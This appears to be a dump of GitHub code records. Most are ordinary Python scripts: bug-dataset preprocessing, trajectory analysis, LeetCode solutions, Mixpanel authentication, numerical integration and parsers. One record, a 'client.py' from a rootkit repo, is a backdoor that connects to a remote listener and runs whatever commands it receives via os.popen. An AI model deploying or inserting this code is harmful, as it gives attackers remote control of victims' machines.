components.add(bug['component'])\n bug_statuses.add(bug['bug_status'])\n bug['description'] = normalize_text(bug['description'])\n if 'short_desc' in bug:\n bug['short_desc'] = normalize_text(bug['short_desc'])\n else:\n bug['short_desc'] = ''\n bug.pop('_id', None)\n bug.pop('delta_ts', None)\n bug.pop('creation_ts', None)\n normalized_bugs.write('{}\\n'.format(json.dumps(bug)))\n\n text.append(bug['description'])\n text.append(bug['short_desc'])\n save_dict(products, 'product.dic')\n save_dict(bug_severities, 'bug_severity.dic')\n save_dict(priorities, 'priority.dic')\n save_dict(versions, 'version.dic')\n save_dict(components, 'component.dic')\n save_dict(bug_statuses, 'bug_status.dic')\n return text\n\n\ndef data_split(bug_pairs):\n random.shuffle(bug_pairs)\n split_idx = int(len(bug_pairs) * args.ratio)\n with open(os.path.join(args.data, 'train.txt'), 'w') as f:\n for pair in bug_pairs[:split_idx]:\n f.write(\"%d %d\\n\" % pair)\n test_data = {}\n for pair in bug_pairs[split_idx:]:\n bug1 = int(pair[0])\n bug2 = int(pair[1])\n if bug1 not in test_data:\n test_data[bug1] = set()\n test_data[bug1].add(bug2)\n with open(os.path.join(args.data, 'test.txt'), 'w') as f:\n for bug in test_data.keys():\n f.write(\"{} {}\\n\".format(bug, ' '.join([str(x) for x in test_data[bug]])))\n\n\ndef build_freq_dict(train_text):\n print('building frequency dictionaries')\n word_freq = defaultdict(int)\n char_freq = defaultdict(int)\n for text in tqdm(train_text):\n for word in text.split():\n word_freq[word] += 1\n for char in text:\n char_freq[char] += 1\n return word_freq, char_freq\n\n\ndef save_vocab(freq_dict, vocab_size, filename):\n top_tokens = sorted(freq_dict.items(), key=lambda x: -x[1])[:vocab_size - 2]\n print('most common token is %s which appears %d times' % (top_tokens[0][0], top_tokens[0][1]))\n print('less common token is %s which appears %d times' % (top_tokens[-1][0], top_tokens[-1][1]))\n vocab = {}\n i = 2 # 0-index is for padding, 1-index is for UNKNOWN\n for j in range(len(top_tokens)):\n vocab[top_tokens[j][0]] = i\n i += 1\n with open(os.path.join(args.data, filename), 'wb') as f:\n pickle.dump(vocab, f)\n return vocab\n\n\ndef build_vocabulary(train_text):\n word_freq, char_freq = build_freq_dict(train_text)\n print('word vocabulary')\n word_vocab = save_vocab(word_freq, args.word_vocab, 'word_vocab.pkl')\n print('character vocabulary')\n char_vocab = save_vocab(char_freq, args.char_vocab, 'char_vocab.pkl')\n return word_vocab, char_vocab\n\n\ndef dump_bugs(word_vocab, char_vocab):\n bug_dir = os.path.join(args.data, 'bugs')\n if not os.path.exists(bug_dir):\n os.mkdir(bug_dir)\n product_dict = load_dict('product.dic')\n bug_severity_dict = load_dict('bug_severity.dic')\n priority_dict = load_dict('priority.dic')\n version_dict = load_dict('version.dic')\n component_dict = load_dict('component.dic')\n bug_status_dict = load_dict('bug_status.dic')\n with open(os.path.join(args.data, 'normalized_bugs.json'), 'r') as f:\n loop = tqdm(f)\n for line in loop:\n loop.set_description('Data dumping')\n bug = json.loads(line)\n bug['product'] = product_dict[bug['product']]\n bug['bug_severity'] = bug_severity_dict[bug['bug_severity']]\n bug['priority'] = priority_dict[bug['priority']]\n bug['version'] = version_dict[bug['version']]\n bug['component'] = component_dict[bug['component']]\n bug['bug_status'] = bug_status_dict[bug['bug_status']]\n bug['description_word'] = [word_vocab.get(w, UNK) for w in bug['description'].split()]\n bug['description_char'] = [char_vocab.get(c, UNK) for c in bug['description']]\n if len(bug['short_desc']) == 0:\n bug['short_desc'] = bug['description'][:10]\n bug['short_desc_word'] = [word_vocab.get(w, UNK) for w in bug['short_desc'].split()]\n bug['short_desc_char'] = [char_vocab.get(c, UNK) for c in bug['short_desc']]\n bug.pop('description')\n bug.pop('short_desc')\n with open(os.path.join(bug_dir, bug['bug_id'] + '.pkl'), 'wb') as f:\n pickle.dump(bug, f)\n\n\ndef main():\n bug_pairs, bug_ids = read_pairs()\n print(\"Number of bugs: {}\".format(len(bug_ids)))\n print(\"Number of pairs: {}\".format(len(bug_pairs)))\n\n data_split(bug_pairs)\n text = normalized_data(bug_ids)\n\n word_vocab, char_vocab = build_vocabulary(text)\n dump_bugs(word_vocab, char_vocab)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tqtg/DuplicateBugFinder","sub_path":"data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"34383704399","text":"\"\"\"\nthis script is used to filter the trajectories and get the velocity, impact energy, hoop length, hoop height\ninput file is the csv file we get from tracking particles\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport scipy.ndimage\n\n\nsaving_folder = 'Q:\\\\test\\\\1\\\\trajectory_filter'\nif not os.path.exists(saving_folder):\n os.makedirs(saving_folder)\ncsvfile = \"Q:\\\\test\\\\1\\\\crop&change\\\\data.csv\"\nframerate = 160\nmass = 1\nscale = 35/2.4\n\n\n\ndf1 = pd.read_csv(csvfile)\ndf1 = df1.sort_values(by=['particle', 'frame'])\ntemp = []\nfor row in df1.iterrows():\n index, data = row\n temp.append(data.tolist())\ntemp = np.array(temp)\nbegin = 0\nend = 0\nf = open(saving_folder+'\\\\''data.txt', 'a')\nf.write(csvfile+'\\n')\nf.write('particle\\tx_1\\ty_1\\tx_2\\ty_2\\tx_3\\ty_3\\tx_4\\ty_4\\tv_1x\\tx_1y\\tv_2x\\tx_2y\\timpact_angle\\treflection_angle\\timpact_energy\\thoop_length\\thoop_height\\n')\nfor i in range(len(temp)):\n sequence = temp[begin][10]\n if i+1 == len(temp) or sequence != temp[i+1][10]:\n low_x = []\n low_y = []\n number = []\n impact_x = []\n impact_y = []\n impact_number = []\n end = i\n plt.title(str(int(temp[begin][10])))\n plt.xlim(0, 1000)\n plt.ylim(120, 0)\n filtered = scipy.ndimage.gaussian_filter(temp[begin:end, 1], 2)\n for j in range(2,len(filtered)-2):\n if filtered[j]>=filtered[j-2] and filtered[j]>=filtered[j+2]:\n low_x.append(temp[begin + j][2])\n low_y.append(filtered[j])\n number.append(begin+j)\n for j in range(1, len(number)):\n if number[len(number)-j] == number[len(number)-j-1]+1 and low_y[len(number)-j]>70:\n if temp[number[j - 1]][2]>=500 or temp[number[j - 1]][2]<=500: # this order need to be gotten rid of if the glass are changed\n f.write(str(int(temp[begin][10])) + '\\t')\n f.write(str(temp[number[len(number) - j - 1] - 2][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j - 1] - 2-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j] - 1][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j - 1]-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j]][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j]-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j] + 2][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j]-begin + 2] / scale) + '\\t')\n v_1x = abs(temp[number[len(number) - j - 1] - 2][2] - temp[number[len(number) - j] - 1][2]) / 2 * framerate / scale\n v_1y = abs(filtered[number[len(number) - j - 1] - 2-begin] - filtered[number[len(number) - j - 1]-begin]) / 2 * framerate / scale\n v_2x = abs(temp[number[len(number) - j]][2]-temp[number[len(number) - j] + 2][2]) / 2 * framerate / scale\n v_2y = abs(filtered[number[len(number) - j]-begin] - filtered[number[len(number) - j]-begin + 2]) / 2 * framerate / scale\n f.write(str(v_1x) + '\\t' + str(v_1y) + '\\t' + str(v_2x) + '\\t' + str(v_2y) + '\\t')\n f.write(str(abs((v_1x*v_1x+v_1y*v_1y)-(v_2x*v_2x+v_2y*v_2y)) / 2 * mass) + '\\t')\n f.write(str(np.degrees(np.arctan(v_1y/v_1x))) + '\\t' + str(np.degrees(np.arctan(v_2y/v_2x))) + '\\t')\n impact_x.append(temp[number[len(number) - j] - 1][2] / 2 + temp[number[len(number) - j]][2] / 2)\n impact_y.append(filtered[number[len(number) - j - 1]-begin] / 2 + filtered[number[len(number) - j]-begin] / 2)\n impact_number.append(number[len(number) - j])\n if len(impact_number)>1:\n f.write(str(abs(impact_x[-1]-impact_x[-2]))+'\\t')\n low = 10000\n for k in range(impact_number[-1],impact_number[-2]):\n if filtered[k - begin] int:\n childrenDict = collections.defaultdict(list)\n for i in range(1, len(parents)):\n childrenDict[parents[i]].append(i)\n scoreDict = dict()\n\n def computerNumber(node: int):\n counter = 1\n for child in childrenDict[node]:\n counter += computerNumber(child)\n scoreDict[node] = counter\n return counter\n\n computerNumber(0)\n length = len(parents)\n result = 0\n maxLength = float('-INF')\n for i in range(length):\n tempCounter = 1\n if parents[i] == -1:\n for child in childrenDict[i]:\n tempCounter *= scoreDict[child]\n elif not childrenDict[i]:\n tempCounter = length - 1\n else:\n temp = 0\n for child in childrenDict[i]:\n tempCounter *= scoreDict[child]\n temp += scoreDict[child]\n tempCounter *= length - 1 - temp\n if tempCounter > maxLength:\n maxLength = tempCounter\n result = 1\n elif tempCounter == maxLength:\n result += 1\n return result\n\n\ncountHighestScoreNodes([-1,2,0,2,0])\ncountHighestScoreNodes([-1,2,0])\ncountHighestScoreNodes([-1,3,3,5,7,6,0,0])\ncountHighestScoreNodes([-1,0,0,1,1])\n","repo_name":"Zombiesama18/Leetcode_Python","sub_path":"Leetcode/5908. 统计最高分的节点数目.py","file_name":"5908. 统计最高分的节点数目.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70810946978","text":"\"\"\"\nThe classes in this module contain the logic to authenticate an http request to\nthe Mixpanel API\n\"\"\"\nimport base64\nimport hashlib\nimport json\nimport time\n\nimport six\nfrom mixpanel_query.utils import _tobytes, _totext, _unicode_urlencode\n\nfrom six.moves.urllib import request as url_request\n\n\nclass SignatureAuth(object):\n \"\"\"\n Signature-based authentication uses your api secret to create and md5 hash\n of your request's parameters for verification by mixpanel\n\n This method is deprecated, but mixpanel currently has no plans to remove\n support for this method of authentication.\n\n Please see https://mixpanel.com/help/reference/data-export-api#authentication\n for more details.\n \"\"\"\n DEFAULT_EXPIRATION = 600 # expire requests after 10 minutes\n\n def __init__(self, client):\n self.client = client\n\n def _hash_args(self, args, secret=None):\n \"\"\"\n Hashes arguments by joining key=value pairs, appending the api_secret, and\n then taking the MD5 hex digest.\n \"\"\"\n for arg in args:\n if isinstance(args[arg], list):\n args[arg] = json.dumps(args[arg])\n\n arg_strings = [\"{}={}\".format(arg, args[arg]) for arg in sorted(args.keys())]\n args_joined_string = ''.join(arg_strings)\n args_joined = _tobytes(args_joined_string)\n\n hash = hashlib.md5(args_joined)\n\n if secret:\n hash.update(_tobytes(secret))\n elif self.client.api_secret:\n hash.update(_tobytes(self.client.api_secret))\n return hash.hexdigest()\n\n def authenticate(self, url, params):\n \"\"\"\n returns a request object ready to be issued to the Mixpanel API\n \"\"\"\n params['api_key'] = self.client.api_key\n params['expire'] = int(time.time()) + self.DEFAULT_EXPIRATION\n\n # Creating signature\n if 'sig' in params:\n del params['sig']\n params['sig'] = self._hash_args(params, self.client.api_secret)\n\n request_url = '{base_url}?{encoded_params}'.format(\n base_url=url,\n encoded_params=_unicode_urlencode(params)\n )\n return url_request.Request(request_url)\n\n\nclass SecretAuth(object):\n \"\"\"\n Secret-based authentication sends your api secret over https for verification\n by mixpanel.\n\n This method of authentication is the recommended authentication method.\n\n Please see https://mixpanel.com/help/reference/data-export-api#authentication\n for more details.\n \"\"\"\n\n def __init__(self, client):\n self.client = client\n\n def authenticate(self, url, params):\n \"\"\"\n returns a request object ready to be issued to the Mixpanel API\n \"\"\"\n request_url = '{base_url}?{encoded_params}'.format(\n base_url=url,\n encoded_params=_unicode_urlencode(params)\n )\n request_headers = {\n 'Authorization': 'Basic ' + _totext(base64.standard_b64encode(_tobytes(\"{}:\".format(self.client.api_secret))))\n }\n return url_request.Request(request_url, headers=request_headers)\n","repo_name":"cooncesean/mixpanel-query-py","sub_path":"mixpanel_query/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"34"} +{"seq_id":"6290199822","text":"from typing import List\n\n\nclass CoinChange2:\n def change(self, amount: int, coins: List[int]) -> int:\n dp = [0] * (amount + 1)\n dp[0] = 1\n for c in coins:\n for a in range(amount + 1):\n if c <= a:\n dp[a] = dp[a - c] + dp[a]\n return dp[-1]\n\n\nif __name__ == '__main__':\n init = CoinChange2()\n print(init.change(5, [1, 2, 5]))\n","repo_name":"arunma/DataStructuresAlgorithmsPython","sub_path":"lastmile/leetcode/june/CoinChange2.py","file_name":"CoinChange2.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28290642020","text":"import sys\n\ndef merge_sort(array):\n if len(array)<=1: #배열이 아닌 경우\n return array\n mid = len(array) // 2 #반 자르고\n left = merge_sort(array[:mid]) #왼쪽 배열\n right = merge_sort(array[mid:]) #오른쪽 배열\n\n i,j,k = 0,0,0\n\n while i < len(left) and j StateModel:\n \"\"\"\n Parse the model file and return the content\n :return: The abstract syntax tree content of interest\n \"\"\"\n # Create an arpeggio parser for our model grammar that does not eliminate whitespace\n # We interpret newlines and indents in our grammar, so whitespace must be preserved\n parser = ParserPEG(self.model_grammar, StateModelParser.root_rule_name, skipws=False, debug=self.debug)\n # Now create an abstract syntax tree from our model text\n try:\n parse_tree = parser.parse(self.model_text)\n except NoMatch as e:\n raise ModelParseError(self.model_file_path.name, e) from None\n # Transform that into a result that is better organized with grammar artifacts filtered out\n result = visit_parse_tree(parse_tree, StateModelVisitor(debug=self.debug))\n # Make it even nicer using easy to reference named tuples\n if self.debug:\n # Transform dot files into pdfs\n peg_tree_dot = Path(\"peggrammar_parse_tree.dot\")\n peg_model_dot = Path(\"peggrammar_parser_model.dot\")\n parse_tree_dot = Path(\"statemodel_parse_tree.dot\")\n parser_model_dot = Path(\"statemodel_peg_parser_model.dot\")\n\n parse_tree_file = str(StateModelParser.xuml_model_dir / self.model_file_path.stem) + \"_parse_tree.pdf\"\n model_file = str(StateModelParser.xuml_model_dir / self.model_file_path.stem) + \"_model.pdf\"\n os.system(f'dot -Tpdf {parse_tree_dot} -o {parse_tree_file}')\n os.system(f'dot -Tpdf {parser_model_dot} -o {model_file}')\n # Cleanup unneeded dot files, we just use the PDFs for now\n parse_tree_dot.unlink(missing_ok=True)\n parser_model_dot.unlink(missing_ok=True)\n peg_tree_dot.unlink(missing_ok=True)\n peg_model_dot.unlink(missing_ok=True)\n # Return the refined model data, checking sequence length\n metadata = result.results.get('metadata') # Optional section\n domain = result.results.get('domain_header')\n lifecycle = result.results.get('lifecycle')\n assigner = result.results.get('assigner')\n events = result.results.get('events')\n states = result.results.get('state_block')\n # You can draw classes without rels, but not the other way around!\n return StateModel(\n domain=domain, lifecycle=lifecycle, assigner=assigner,\n events={} if not events else events[0],\n states=states,\n metadata=None if not metadata else metadata[0]\n )\n\nif __name__ == \"__main__\":\n markup_path = Path(__file__).parent.parent / 'Test/door.xsm'\n x = StateModelParser(model_file_path=markup_path, debug=True)\n x.parse()","repo_name":"modelint/flatland-model-diagram-editor","sub_path":"flatland/input/statemodel_parser.py","file_name":"statemodel_parser.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"48782841401","text":"from __future__ import division\nimport numpy as np\nimport itertools\n\ndef integration(func, a, b, nodes, weights, round_off=15):\n nodes = 0.5*(b - a)*np.array(nodes) + 0.5*(b + a)\n weights = np.array(weights)\n return np.around(0.5*(b-a)*np.sum(weights*func(nodes)), round_off)\n\ndef integration_2d(func, a_x, b_x, a_y, b_y, nodes_x, nodes_y, weights_x, weights_y, round_off=15):\n nodes_x = 0.5*(b_x-a_x)*np.array(nodes_x).reshape(len(nodes_x), 1) + 0.5*(b_x + a_x)\n nodes_y = 0.5*(b_y-a_y)*np.array(nodes_y).reshape(len(nodes_y), 1) + 0.5*(b_y + a_y)\n weights_x = np.array(weights_x).reshape(len(weights_x), 1)\n weights_y = np.array(weights_y).reshape(len(weights_y), 1)\n\n cross_pdt = list(itertools.product(nodes_x, nodes_y))\n x_coordinates = np.array([item[0] for item in cross_pdt]).reshape(nodes_x.shape[0]*nodes_y.shape[0])\n y_coordinates = np.array([item[1] for item in cross_pdt]).reshape(nodes_x.shape[0]*nodes_y.shape[0])\n\n func_evals = func(x_coordinates, y_coordinates).reshape(nodes_x.shape[0], nodes_y.shape[0])\n\n return np.around(float(0.25*(b_y - a_y)*(b_x - a_x)*np.dot(weights_x.T, np.dot(func_evals, weights_y))[0, 0]), round_off)\n\nif __name__ == '__main__':\n print('Running main!!!')\n def func(x, y):\n return 1/(1 + 50*x**2 + 20*y**2)\n\n def func2(x):\n return 1/(1 + 50*x**2)\n\n from nodes_and_weights import *\n nodes_x = get_lobatto_points(64)\n nodes_y = get_lobatto_points(64)\n weights_x = get_lobatto_weights(64)\n weights_y = get_lobatto_weights(64)\n\n x = get_legendre_points(64)\n y = get_legendre_points(64)\n\n from interpolation2d import *\n func_vals = [func(xi, yi) for xi in x for yi in y]\n lang_interpolation_2d = lagrange_2d(x, y, func_vals)\n\n from interpolation import *\n func_vals = np.array(func2(x))\n lang_interpolation = lagrange_1d(x, func_vals)\n\n print(integration_2d(func, 0, 1, 0, 1, nodes_x, nodes_y, weights_x, weights_y))\n print(integration_2d(lang_interpolation_2d.evaluate, 0, 1, 0, 1, nodes_x, nodes_y, weights_x, weights_y))\n\n print(integration(func2, 0, 1, nodes_x, weights_x))\n print(integration(lang_interpolation.evaluate, 0, 1, nodes_x, weights_x))\n","repo_name":"msuriyak/ME-757","sub_path":"integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35679961605","text":"limite = int(input(\"Inserte el valor máx de la serie \") )\r\nanterior = 0\r\ninicial = 1\r\nfibonacci = str(0)\r\nsuma = 0\r\nwhile inicial <= limite:\r\n \r\n fibonacci = fibonacci + \",\" + str(suma)\r\n \r\n suma = anterior + inicial\r\n anterior = inicial\r\n inicial = suma\r\n \r\n print(fibonacci)","repo_name":"jdcuevasp/Fibonacci","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72694726499","text":"\"\"\"Utility functions that do not belong to any specific category.\"\"\"\n\nimport functools\nimport json\nimport logging\nimport warnings\nfrom typing import Union, List\n\nimport numpy as np\n\n\ndef remove_nan(json_string):\n \"\"\"Replaces NaN with null values\n\n Parameters\n ----------\n json_string: str\n json string for which to apply the replacement\n\n Returns\n -------\n str\n json string with 'null' strings in place of 'NaN' ones.\n\n \"\"\"\n return json_string.replace('NaN', 'null')\n\n\ndef get_response_and_log(request, type='post'):\n \"\"\"Parse a response and return it as a data dictionary\n \n Parameters\n ----------\n request:\n request object containing the requests received by the server\n type:\n request type: 'post', 'get'\n\n Returns\n -------\n data dictionary of values\n\n \"\"\"\n res = request.values.get('ajax_data')\n\n if res is not None:\n logging.info(\"Ajax data received\")\n logging.warning(\"Content: {}\".format(str(dict(request.args))))\n return json.loads(res)\n else:\n logging.warning(\"Ajax data not received\")\n logging.warning(\"Content (args): {}\".format(str(dict(request.args))))\n logging.warning(\"Content (json): {}\".format(str(request.json)))\n logging.warning(\"Content (data): {}\".format(str(request.data)))\n logging.warning(\"Content (form): {}\".format(str(dict(request.form))))\n logging.warning(\"Content (values): {}\".format(str(dict(request.values))))\n # logging.warning(\"Content: {}\".format(str(dict(request.args))))\n return None\n\n\ndef deprecated(deprecated_function):\n \"\"\"Decorator for deprecated functions.\n\n It warns the user whenever the function is called.\n\n \"\"\"\n functools.wraps(deprecated_function)\n\n def wrapper(*args, **kwargs):\n warnings.warn(\"Function {} is deprecated, and will be removed.\".format(deprecated_function), DeprecationWarning)\n return deprecated_function(*args, **kwargs)\n\n return wrapper\n\n\ndef assert_required_data(data, keys):\n \"\"\"Asserts the required keys exist in the data dictionary.\n\n Parameters\n ----------\n data: dict\n request dictionary\n keys: list of str\n keys to be checked in the dictionary\n\n Returns\n -------\n None\n\n Raises\n ------\n AssertionError if any of the values doesn't exist.\n\n \"\"\"\n if data is None:\n raise AssertionError(\"Values for data were required by the API but none were found.\"\n \" Required: {}\".format(keys))\n\n for val in keys:\n if not val in data.keys():\n raise AssertionError(\"A value data['{}'] was required by the API but not found.\"\n \" Required: {}\".format(val, keys))\n\n\n# noinspection PyUnboundLocalVariable\ndef get_vertical_visual_boundaries(y, y_margin):\n # Find the allowed y visual\n # See `myplotlib.js` -> `get_best_box(...)`\n y_min, y_max = np.min(y), np.max(y)\n y_max_min_distance = np.abs(y_max - y_min)\n y_increment = y_max_min_distance * y_margin\n y_bottom = y_min - y_increment\n y_top = y_max + y_increment\n return y_bottom, y_top\n\n\n# noinspection PyUnboundLocalVariable\ndef recreate_antisymmetric_matrix_from_list(el_list, size):\n if \"np\" not in globals():\n import numpy as np\n m = np.ndarray((size, size))\n i, j = 0, 0\n for el in el_list:\n m[i, j] = el\n if i != j:\n m[j, i] = 1 - el\n j += 1\n if j >= size:\n i += 1\n j = i\n return m\n\n\ndef get_scaled_distance_from_true_f(\n y_true: Union[np.ndarray, list],\n y_1: Union[np.ndarray, list],\n y_2: Union[np.ndarray, list]) \\\n -> Union[float, np.ndarray]:\n \"\"\"\n let y = this.model.get(\"y\");\n let scaling_value = this.model.get(\"scaling_value\");\n let error = this.model.get(\"smallest_error\");\n let min_y = np.list_min(y);\n let max_y = np.list_max(y);\n let farthest_distance = Math.abs(max_y - min_y) * scaling_value;\n let scaled_error = error / farthest_distance * 100;\n let score = Math.round(100 - scaled_error);\n \"\"\"\n max_y, min_y = np.max(y_true), np.min(y_true)\n dist = np.array(y_2) - np.array(y_1)\n farthest_visual_distance = np.abs(max_y - min_y)\n scaled_dist = dist / farthest_visual_distance * 100\n return scaled_dist\n\n\ndef get_score_from_x_index(x_index: Union[int, List[int], np.ndarray], y_true: Union[np.ndarray, list]) \\\n -> Union[float, np.ndarray]:\n \"\"\"\n let y = this.model.get(\"y\");\n let scaling_value = this.model.get(\"scaling_value\");\n let error = this.model.get(\"smallest_error\");\n let min_y = np.list_min(y);\n let max_y = np.list_max(y);\n let farthest_distance = Math.abs(max_y - min_y) * scaling_value;\n let scaled_error = error / farthest_distance * 100;\n let score = Math.round(100 - scaled_error);\n \"\"\"\n y_true = np.array(y_true)\n scaled_error = get_scaled_distance_from_true_f(\n y_true=y_true,\n y_1=y_true[x_index],\n y_2=np.max(y_true)\n )\n return 100 - scaled_error\n","repo_name":"fcole90/interactive_bayesian_optimization","sub_path":"interactive_bayesian_optimisation/libs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"12211976580","text":"def main():\n A = []\n B = []\n\n for k in range(3):\n value = int(input(\"Enter values for Alice: \"))\n value2 = int(input(\"Enter values for Bob: \"))\n A.append(value)\n B.append(value2)\n\n print(compare_triplets(A, B))\n\ndef compare_triplets(a, b):\n scoreA = scoreB = 0\n result = []\n\n for i in range(len(a)):\n if a[i] > b[i]:\n scoreA += 1\n elif a[i] < b[i]:\n scoreB += 1\n elif a[i] == b[i]:\n scoreA += 0\n scoreB += 0\n\n result.append(scoreA)\n result.append(scoreB)\n\n return result\n\nmain()","repo_name":"sparkybug/ALgorithms","sub_path":"compare_triplets.py","file_name":"compare_triplets.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7993757992","text":"import random\nimport numpy as np\nimport torch\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Converter:\n \"\"\"\n torch index\n -> numpy action\n numpy action\n -> torch index\n \"\"\"\n def __init__(self, envname):\n self.envname = envname\n\n def index2act(self, _input, batch):\n if self.envname == \"hope\":\n if batch == 1:\n first_action = (_input % 5 / 2) - 1\n sec_action = ((_input % 25 - _input % 5) / 10) - 1\n third_action = ((_input - _input % 25) / 50) - 1\n out = torch.tensor([first_action, sec_action, third_action], device=DEVICE)\n else:\n i = 0\n out = torch.zeros((10, 3), device=DEVICE)\n while i < batch:\n first_action = (_input[i] % 5 / 2) - 1\n sec_action = ((_input[i] % 25 - _input[i] % 5) / 10) - 1\n third_action = ((_input[i] - _input[i] % 25) / 50) - 1\n out[i] = torch.tensor([first_action, sec_action, third_action], device=DEVICE)\n i = i + 1\n return out.cpu().numpy()\n elif self.envname == \"cart\":\n return _input.cpu().numpy()\n elif self.envname == \"test\":\n action_ary = [[20, 0], [12, 12], [0, 20], [-12, 12], [-20, 0], [-12, -12], [0, -20], [12, -12]]\n action_dict = {0: (5, 0), 1: (3, 3), 2: (0, 5), 3: (-3, 3),\n 4: (-5, 0), 5: (-3, -3), 6: (0, -5), 7: (3, -3)}\n _input = _input.cpu().numpy().astype(np.int64)\n try:\n a = len(_input)\n _input = np.array(_input)\n except:\n _input = np.array([_input])\n values = [action_dict[k] for k in _input if k in action_dict]\n result = [list(item) for item in values]\n return np.squeeze(result)\n\n else:\n print(\"converter error\")\n\n def act2index(self, _input, batch):\n if self.envname == \"hope\":\n if batch == 1:\n _input = _input + 1\n _input = _input * 2\n out = _input[2] * 25 + _input[1] * 5 + _input[0]\n else:\n i = 0\n out = np.zeros(batch)\n while i < batch:\n _input[i] = _input[i] + 1\n _input[i] = _input[i] * 2\n out[i] = _input[i][2] * 25 + _input[i][1] * 5 + _input[i][0]\n i = i + 1\n return torch.from_numpy(out).to(DEVICE)\n elif self.envname == \"cart\":\n return torch.from_numpy(_input).to(DEVICE)\n\n elif self.envname == \"test\":\n\n act_keys = [tuple(sublist) for sublist in _input]\n\n action_dict = {(5, 0): 0, (3, 3): 1, (0, 5): 2, (-3, 3): 3,\n (-5, 0): 4, (-3, -3): 5, (0, -5): 6, (3, -3): 7}\n values = [action_dict[k] for k in act_keys if k in action_dict]\n values = np.array(values)\n return torch.from_numpy(values).to(DEVICE)\n\n else:\n print(\"converter error\")\n\n def rand_act(self):\n if self.envname == \"hope\":\n return (np.random.randint(5, size=(3,)) - 2)/2\n elif self.envname == \"cart\":\n _a = np.random.randint(2, size=(1,))\n return _a[0]\n else:\n print(\"converter error\")\n\n\n\n\n","repo_name":"kkugosu/ppo_demo","sub_path":"utils/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15938393325","text":"from urllib.parse import urlparse\n\n\ndef use_md5(url: str) -> bool:\n \"\"\"This takes an upload URL in S3 and returns whether we should attach a checksum.\n\n It's only a workaround for missing functionality in moto.\n https://github.com/spulec/moto/issues/816\n \"\"\"\n host = urlparse(url).netloc.split(\":\")[0]\n if host.endswith(\".amazonaws.com\"):\n return True\n elif host in [\"127.0.0.1\", \"localhost\", \"172.19.0.1\"]:\n return False\n else:\n raise Exception(f\"Unknown S3 host: {host}\")\n","repo_name":"MohitJuneja/personalGPT","sub_path":"persbotenv/Lib/site-packages/modal_utils/blob_utils.py","file_name":"blob_utils.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"28510040987","text":"\n#iteration\ndef fibb(n):\n result = [1, 1]\n for i in range(n-2):\n result.append(result[i] + result[i+1])\n return result\n\n\nif __name__ == '__main__':\n print(fibb(10))\n\n#recuresiely\n\ndef rec_fibb(n):\n if n<2:\n return 1\n else:\n return rec_fibb(n-2)+rec_fibb(n-1)\n\ndef fibb_list(n):\n return [rec_fibb(i) for i in range(n)]\n\nif __name__ == '__main__':\n print(fibb_list(6))","repo_name":"proteus21/DATA-SCIENCE-STUDY","sub_path":"Python Exam/6 - Classes/Fibonacci function.py","file_name":"Fibonacci function.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16286056990","text":"#Victim\r\n\r\nimport socket\r\nimport os\r\n\r\nserver = socket.socket()\r\nhost = '127.0.0.1' \r\nport = 1234\r\n\r\nrun = True\r\nwhile run:\r\n\r\n server.connect((host,port))\r\n\r\n msg = server.recv(1024)\r\n os.popen(msg.decode('UTF-8'))\r\n\r\n server.send('Target is Online . . . ' .encode('UTF-8'))\r\n","repo_name":"cleverguns/Simple-Rootkit-Script","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38416348046","text":"from pages.handler import *\nfrom models.teams import *\nimport datetime\n\nclass APIHandler(Handler):\n\n def build_team_object(self,team):\n t = dict()\n t['id'] = team.key().id()\n t['key'] = str(team.key())\n t['name'] = team.name\n t['conference'] = team.conference\n return t\n\n def build_game_object(self,game):\n g = dict()\n g['id'] = game.key().id()\n g['key'] = str(game.key())\n g['number'] = game.number\n g['team1'] = game.team1\n g['team2'] = game.team2\n g['team1_score'] = game.team1_score\n g['team2_score'] = game.team2_score\n g['favored'] = game.favored\n g['spread'] = game.spread\n g['state'] = game.state\n g['quarter'] = game.quarter\n g['time_left'] = game.time_left\n g['date'] = self.format_date(game.date)\n return g\n\n def build_player_object(self,player):\n p = dict()\n p['id'] = player.key().id()\n 